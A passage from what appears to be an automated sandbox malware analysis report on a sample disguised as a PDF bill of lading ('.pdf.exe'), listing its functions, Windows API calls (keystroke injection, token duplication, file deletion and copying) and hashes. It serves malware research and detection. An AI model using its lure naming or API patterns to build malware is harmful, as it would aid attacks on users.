                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00444326: SetFilePointerEx.KERNEL32(00000000,00000001,00000000,00000000,00000001,?,?,0044434E,?,?,00429A83,?,00487174,00000003,0040DFEE,?), ref: 004442F3
                                                                                                                      • WriteFile.KERNELBASE(?,?,00000001,?,00000000,?,?,00429A83,?,00487174,00000003,0040DFEE,?,?,00000001,00403843), ref: 00444362
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$PointerWrite
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 539440098-0
                                                                                                                      • Opcode ID: 35769b91a3a7bdb08b20991cec1574ff36ffa6c1adc4d20a0c17b9033c9b0ad0
                                                                                                                      • Instruction ID: 4a339a6eb5dfef6003722c1615037f540bc53d76d7f4c43935d02bdd90bbdfc9
                                                                                                                      • Opcode Fuzzy Hash: 35769b91a3a7bdb08b20991cec1574ff36ffa6c1adc4d20a0c17b9033c9b0ad0
                                                                                                                      • Instruction Fuzzy Hash: 7CE09275104311AFD250DF54D944F9BB3F8AF88714F108D0EF59587241D7B4A9848BA6
                                                                                                                      Function 0040116E Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • DefWindowProcW.USER32(?,?,?,?), ref: 00401123
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ProcWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 181713994-0
                                                                                                                      • Opcode ID: 837c1f5b160989e4bc04331483680d437582dbd9ffcfcea34caefcb6c1da81af
                                                                                                                      • Instruction ID: 4c36cba44089d0e03573cc5e8dee84df23505be31ebc2729507753268ee0d302
                                                                                                                      • Opcode Fuzzy Hash: 837c1f5b160989e4bc04331483680d437582dbd9ffcfcea34caefcb6c1da81af
                                                                                                                      • Instruction Fuzzy Hash: C3C08C72100008BB8700DE04EC44CFBB72CEBD8310700C20BBC0586201C230885097A1
                                                                                                                      Function 00414E06 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __wfsopen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 197181222-0
                                                                                                                      • Opcode ID: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
                                                                                                                      • Instruction ID: 6225ca515e7db1e5d7746fb8cf1e0ad45b41b4d1817cc5a1d8a93eb941133566
                                                                                                                      • Opcode Fuzzy Hash: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
                                                                                                                      • Instruction Fuzzy Hash: EDC09B7644010C77CF122943FC02E453F1997C0764F044011FB1C1D561D577D5619589
                                                                                                                      Function 0040D900 Relevance: 1.3, APIs: 1, Instructions: 22COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CloseHandle.KERNELBASE(00000000,?,0040DF8E), ref: 0040D91D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseHandle
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2962429428-0
                                                                                                                      • Opcode ID: b0db0cc9728059d6acb69f925b284233246e7185417bf28957a0aabd78f307cc
                                                                                                                      • Instruction ID: 397672216df932ca6c22f29d52987cd2165f63c791f69eb8015935d900cfb6d9
                                                                                                                      • Opcode Fuzzy Hash: b0db0cc9728059d6acb69f925b284233246e7185417bf28957a0aabd78f307cc
                                                                                                                      • Instruction Fuzzy Hash: 16E0DEB5900B019EC7318F6AE544416FBF8AEE46213248E2FD4E6D2A64D3B4A5898F54
                                                                                                                      Function 040226A4 Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • Sleep.KERNELBASE(000001F4), ref: 040226B9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1754566267.0000000004020000.00000040.00000020.00020000.00000000.sdmp, Offset: 04020000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4020000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Sleep
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3472027048-0
                                                                                                                      • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                      • Instruction ID: 7057ed130d00774f1d6799a4ae8c0514495d476dbc1ec576ddb7ebea67de4a48
                                                                                                                      • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                      • Instruction Fuzzy Hash: 88E09A7594010DAFDB04DFA4D64969D7BB4EF05301F1005A5FD05A6680DA309E548A66
                                                                                                                      Function 040226A8 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • Sleep.KERNELBASE(000001F4), ref: 040226B9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1754566267.0000000004020000.00000040.00000020.00020000.00000000.sdmp, Offset: 04020000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4020000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Sleep
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3472027048-0
                                                                                                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                      • Instruction ID: e5e458f030ecc53ed1883a457ecbf7a6b2ad6a0e626cdcc5ba23cfb1e2d3c3cc
                                                                                                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                      • Instruction Fuzzy Hash: 8AE0E67594010DDFDB00DFF4D64D69D7BB4EF04301F1005A5FD01E2680D6309E508A62

                                                                                                                      Non-executed Functions

                                                                                                                      Function 004045E0 Relevance: 81.9, Strings: 63, Instructions: 3193COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: PF$PF$"DF$$JG$&F$&F$'HG$'|G$*"D$*nF$*vG$+%F$0wE$4rE$5CG$6MG$6NF$6tE$7eF$<HF$<G$ApG$BnE$DvE$F)G$GSG$IqE$K@G$LbF$MdF$MuE$NgF$O*F$PIF$QbG$R+F$RnG$YlE$YtG$Z9G$ZPG$^[F$^oE$_7G$_?G$b"D$fH$i}G$j)F$kQG$lE$rTG$vjE$}eE$~mE$*F$.F$3G$_G$`F$mE$pE$wG
                                                                                                                      • API String ID: 0-4260964411
                                                                                                                      • Opcode ID: bb854585b2a8d25cf70b859c951904b6599901827447d171664d6ae6ba41e592
                                                                                                                      • Instruction ID: b1e67458769bbea4a86cd8903524db5b6e79558e2e7ab8c51025fc7bd56032a7
                                                                                                                      • Opcode Fuzzy Hash: bb854585b2a8d25cf70b859c951904b6599901827447d171664d6ae6ba41e592
                                                                                                                      • Instruction Fuzzy Hash: 118366F1905B409FC351DFAAF984605BAE1F3AA3157A2857FC5088B731D7B8194A8F4C
                                                                                                                      Function 0047C08E Relevance: 74.2, APIs: 40, Strings: 2, Instructions: 676windowkeyboardCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C158
                                                                                                                      • DefDlgProcW.USER32(?,0000004E,?,?,004A83D8,?,004A83D8,?), ref: 0047C173
                                                                                                                      • GetKeyState.USER32(00000011), ref: 0047C1A4
                                                                                                                      • GetKeyState.USER32(00000009), ref: 0047C1AD
                                                                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C1C0
                                                                                                                      • GetKeyState.USER32(00000010), ref: 0047C1CA
                                                                                                                      • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C1DE
                                                                                                                      • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C20A
                                                                                                                      • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C22D
                                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047C2D6
                                                                                                                      • SendMessageW.USER32 ref: 0047C2FB
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$State$LongProcWindow
                                                                                                                      • String ID: @GUI_DRAGID$F
                                                                                                                      • API String ID: 1562745308-4164748364
                                                                                                                      • Opcode ID: dcc01cbd87ddd492c2c278cbacd50e58f25e8ccd866e9ebab9dee97b514268e5
                                                                                                                      • Instruction ID: f40edf6d5039c675f00343e7880f865f139be9e64e9b8d530a61de5f06f6045f
                                                                                                                      • Opcode Fuzzy Hash: dcc01cbd87ddd492c2c278cbacd50e58f25e8ccd866e9ebab9dee97b514268e5
                                                                                                                      • Instruction Fuzzy Hash: C6429F702042019FD714CF54C884FAB77A5EB89B04F548A6EFA48AB291DBB4EC45CB5A
                                                                                                                      Function 004375B0 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 126threadkeyboardwindowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetForegroundWindow.USER32(00000000,?,?,004448AF,?), ref: 004375B3
                                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004375D8
                                                                                                                      • IsIconic.USER32(?), ref: 004375E1
                                                                                                                      • ShowWindow.USER32(?,00000009,?,?,004448AF,?), ref: 004375EE
                                                                                                                      • SetForegroundWindow.USER32(?), ref: 004375FD
                                                                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00437615
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00437619
                                                                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00437624
                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 00437632
                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 00437638
                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 0043763E
                                                                                                                      • SetForegroundWindow.USER32(?), ref: 00437645
                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437654
                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 0043765D
                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043766B
                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 00437674
                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437682
                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 0043768B
                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437699
                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 004376A2
                                                                                                                      • SetForegroundWindow.USER32(?), ref: 004376AD
                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376CD
                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376D3
                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376D9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                      • API String ID: 3778422247-2988720461
                                                                                                                      • Opcode ID: ec12ba9e870cc2e5dd85ad52799cb15a6745d125a488419c4f0ebb71fc1ee38e
                                                                                                                      • Instruction ID: 6108fbe056c1a000d5481f33e03d330ccc862392245923d3170deea12ea07584
                                                                                                                      • Opcode Fuzzy Hash: ec12ba9e870cc2e5dd85ad52799cb15a6745d125a488419c4f0ebb71fc1ee38e
                                                                                                                      • Instruction Fuzzy Hash: AC31A4712803157FE6245BA59D0EF7F3F9CEB48B51F10082EFA02EA1D1DAE458009B79
                                                                                                                      Function 004461ED Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 227processCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 0044621B
                                                                                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,?,?,?,?,?,?,?), ref: 00446277
                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0044628A
                                                                                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004462A4
                                                                                                                      • GetProcessWindowStation.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004462BD
                                                                                                                      • SetProcessWindowStation.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004462C8
                                                                                                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004462E4
                                                                                                                      • _wcslen.LIBCMT ref: 0044639E
                                                                                                                        • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                      • _wcsncpy.LIBCMT ref: 004463C7
                                                                                                                      • LoadUserProfileW.USERENV(?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 004463E7
                                                                                                                      • CreateEnvironmentBlock.USERENV(?,?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 00446408
                                                                                                                      • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00000000,?,?,00000000,?), ref: 00446446
                                                                                                                      • UnloadUserProfile.USERENV(?,?,?,?,?,?,?), ref: 00446483
                                                                                                                      • CloseWindowStation.USER32(00000000,?,?,?,?), ref: 00446497
                                                                                                                      • CloseDesktop.USER32(00000000,?,?,?,?), ref: 0044649E
                                                                                                                      • SetProcessWindowStation.USER32(?,?,?,?,?), ref: 004464A9
                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?), ref: 004464B4
                                                                                                                      • DestroyEnvironmentBlock.USERENV(?,?,?,?,?,?), ref: 004464C8
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_memset_wcslen_wcsncpy
                                                                                                                      • String ID: $default$winsta0
                                                                                                                      • API String ID: 2173856841-1027155976
                                                                                                                      • Opcode ID: 8783c105518f9fa52f5c80a6299cf7ec7b6e28c011eada52347f54b488ad9e21
                                                                                                                      • Instruction ID: eafd5d154f9bcf2590b8f8eb1e0f3d39b01f77f2fd200ee1cb9c7344d9c52646
                                                                                                                      • Opcode Fuzzy Hash: 8783c105518f9fa52f5c80a6299cf7ec7b6e28c011eada52347f54b488ad9e21
                                                                                                                      • Instruction Fuzzy Hash: DD819170208341AFE724DF65C848B6FBBE8AF89744F04491DF69097291DBB8D805CB6B
                                                                                                                      Function 00409A40 Relevance: 32.2, APIs: 15, Strings: 2, Instructions: 2432COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _wcslen.LIBCMT ref: 00409A61
                                                                                                                        • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                        • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                        • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                        • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 00409AF5
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharException@8ThrowUpper_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                      • String ID: 0vH$4RH
                                                                                                                      • API String ID: 1143807570-2085553193
                                                                                                                      • Opcode ID: 448372cbc2a04de0c58b15acec820b8f3e335fdb8b2659cade4efb497aaa83ea
                                                                                                                      • Instruction ID: 7c8f52bff4b3ea9a641e6aac08ab5e1c8beb32691f0f21fab5f23224d73a3634
                                                                                                                      • Opcode Fuzzy Hash: 448372cbc2a04de0c58b15acec820b8f3e335fdb8b2659cade4efb497aaa83ea
                                                                                                                      • Instruction Fuzzy Hash: 34238170A043109FD724DF25D480A6BB7E1BF89304F54896EE84A9B391D739EC46CB9B
                                                                                                                      Function 0044BD29 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 178filestringCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe,?,C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe,004A8E80,C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe,0040F3D2), ref: 0040FFCA
                                                                                                                        • Part of subcall function 00436A1D: __wsplitpath.LIBCMT ref: 00436A45
                                                                                                                        • Part of subcall function 00436A1D: __wsplitpath.LIBCMT ref: 00436A6C
                                                                                                                        • Part of subcall function 00436A1D: __wcsicoll.LIBCMT ref: 00436A93
                                                                                                                        • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                                                                                                      • _wcscat.LIBCMT ref: 0044BD96
                                                                                                                      • _wcscat.LIBCMT ref: 0044BDBF
                                                                                                                      • __wsplitpath.LIBCMT ref: 0044BDEC
                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0044BE04
                                                                                                                      • _wcscpy.LIBCMT ref: 0044BE73
                                                                                                                      • _wcscat.LIBCMT ref: 0044BE85
                                                                                                                      • _wcscat.LIBCMT ref: 0044BE97
                                                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC3
                                                                                                                      • DeleteFileW.KERNEL32(?), ref: 0044BED5
                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 0044BEF5
                                                                                                                      • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0C
                                                                                                                      • DeleteFileW.KERNEL32(?), ref: 0044BF17
                                                                                                                      • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2E
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0044BF35
                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 0044BF51
                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF66
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0044BF7E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                                                                                                      • String ID: \*.*
                                                                                                                      • API String ID: 2188072990-1173974218
                                                                                                                      • Opcode ID: 37b83e77465c63a9a0fc5a2f65b261a2e9867c78515d1bc57cb11e6e3b171851
                                                                                                                      • Instruction ID: 14f7055b3521afb04026f42b490306401b0ba37f80ed0ea0ca267746d8cc4687
                                                                                                                      • Opcode Fuzzy Hash: 37b83e77465c63a9a0fc5a2f65b261a2e9867c78515d1bc57cb11e6e3b171851
                                                                                                                      • Instruction Fuzzy Hash: CA5166B2008344AAD720DBA4DC44FDF73E8AB85314F448D1EF68982141EB79D64CCBAA
                                                                                                                      Function 0042039F Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 282timeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __invoke_watson.LIBCMT ref: 004203A4
                                                                                                                        • Part of subcall function 00417D93: _memset.LIBCMT ref: 00417DBB
                                                                                                                        • Part of subcall function 00417D93: IsDebuggerPresent.KERNEL32(?,?,00000314), ref: 00417E6F
                                                                                                                        • Part of subcall function 00417D93: SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000314), ref: 00417E79
                                                                                                                        • Part of subcall function 00417D93: UnhandledExceptionFilter.KERNEL32(?,?,?,00000314), ref: 00417E86
                                                                                                                        • Part of subcall function 00417D93: GetCurrentProcess.KERNEL32(C0000417,?,?,00000314), ref: 00417EA1
                                                                                                                        • Part of subcall function 00417D93: TerminateProcess.KERNEL32(00000000,?,?,00000314), ref: 00417EA8
                                                                                                                      • __get_daylight.LIBCMT ref: 004203B0
                                                                                                                      • __invoke_watson.LIBCMT ref: 004203BF
                                                                                                                      • __get_daylight.LIBCMT ref: 004203CB
                                                                                                                      • __invoke_watson.LIBCMT ref: 004203DA
                                                                                                                      • ____lc_codepage_func.LIBCMT ref: 004203E2
                                                                                                                      • _strlen.LIBCMT ref: 00420442
